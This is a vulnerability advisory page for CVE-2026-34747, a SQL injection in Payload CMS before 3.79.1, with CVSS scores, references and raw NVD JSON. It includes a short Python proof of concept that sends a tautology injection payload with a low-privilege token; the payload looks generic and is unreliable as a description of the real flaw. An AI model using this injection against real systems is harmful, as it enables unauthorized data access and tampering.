CVE-2026-34747

Description

Payload is a free and open source headless content management system. Prior to version 3.79.1, certain request inputs were not properly validated. An attacker could craft requests that influence SQL query execution, potentially exposing or modifying data in collections. This issue has been patched in version 3.79.1.

CVSS Details

CVSS Score

8.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:* - VULNERABLE

Payload CMS < 3.79.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "http://target-payload-cms/api/collection/find"

# Malicious payload exploiting input validation issue
# This payload attempts to manipulate the SQL query
payload = {
    "where": {
        "id": {
            "equals": "1' OR '1'='1" 
        }
    }
}

try:
    # Sending the request with low privileges (PR:L)
    response = requests.post(target_url, json=payload, headers={"Authorization": "Bearer LOW_PRIV_TOKEN"})
    
    if response.status_code == 200:
        print("[+] Potential SQL Injection successful. Response:")
        print(response.text)
    else:
        print("[-] Exploit failed or payload incorrect.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34747
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34747
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34747/
[4] VulDB https://vuldb.com/cve/CVE-2026-34747
[5] https://github.com/payloadcms/payload/releases/tag/v3.79.1
[6] https://github.com/payloadcms/payload/security/advisories/GHSA-7xxh-373w-35vg

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34747", "sourceIdentifier": "[email protected]", "published": "2026-04-01T20:16:26.887", "lastModified": "2026-04-13T18:53:11.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Payload is a free and open source headless content management system. Prior to version 3.79.1, certain request inputs were not properly validated. An attacker could craft requests that influence SQL query execution, potentially exposing or modifying data in collections. This issue has been patched in version 3.79.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.79.1", "matchCriteriaId": "B4AE65F8-450D-4573-9CD7-1AA42CE5DC28"}]}]}], "references": [{"url": "https://github.com/payloadcms/payload/releases/tag/v3.79.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/payloadcms/payload/security/advisories/GHSA-7xxh-373w-35vg", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}